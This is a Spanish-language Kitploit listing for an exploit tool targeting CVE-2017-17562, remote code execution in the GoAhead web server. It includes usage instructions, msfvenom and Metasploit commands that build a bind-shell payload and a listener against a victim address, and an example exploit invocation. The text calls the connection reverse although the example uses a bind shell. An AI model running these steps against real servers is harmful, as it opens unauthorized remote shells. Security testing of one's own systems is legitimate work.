Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
goahead-rce-exploit — Exploit para la vulnerabilidad CVE-2017-17562, que permite RCE en GoAhead (< v3.6.5) si CGI está habilitado y un programa CGI está enlazado dinámicamente. | Kitploit
Herramientas/GitHubGitHub/nu11pointer/goahead-rce-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubnu11pointer/goahead-rce-exploit

goahead-rce-exploit

Exploit para la vulnerabilidad CVE-2017-17562, que permite RCE en GoAhead (< v3.6.5) si CGI está habilitado y un programa CGI está enlazado dinámicamente.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
81hace 2 añosAún no revisado

GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Ejecución remota de código

Exploit para la vulnerabilidad CVE-2017-17562, que permite RCE en GoAhead (< v3.6.5) si CGI está habilitado y un programa CGI está enlazado dinámicamente.

Uso

root@kitploit:~
$ python3 exploit.py [-h] --host HOST --port PORT --payload PAYLOAD [--ssl] [--cgi CGI]

Requisitos

root@kitploit:~
$ python3 -m pip install -r requirements.txt

¡Atención!

Primero necesitas generar el payload y configurar la conexión de escucha.
Ejemplo:
(Atacante: 192.168.1.100 - Víctima: 192.168.1.200)

root@kitploit:~
$ msfvenom -a x64 --platform Linux -p generic/shell_bind_tcp LHOST=192.168.1.100 LPORT=1337 -f elf-so -o payload.so
$ msfconsole
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload generic/shell_bind_tcp
msf6 exploit(multi/handler) > set LPORT=1337
msf6 exploit(multi/handler) > set RHOST=192.168.1.200
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.1.200:1337

Luego, en otra terminal, debes ejecutar este exploit para enviar el payload que iniciará la conexión inversa al listener.

Argumentos

root@kitploit:~
Required arguments:
  --host HOST        Host running the GoAhead webserver.
  --port PORT        Port running the GoAhead webserver. Default: 80
  --payload PAYLOAD  Path to the payload.

Optional arguments:
  --ssl              Host is using SSL.
  --cgi LIST         Paths list to discover the CGI script on the GoAhead server. Default: paths.lst

Ejemplo

root@kitploit:~
$ python3 exploit.py --host 192.168.1.200 --port 8080 --cgi custom_list.txt --payload payload.so --ssl
Descargar herramienta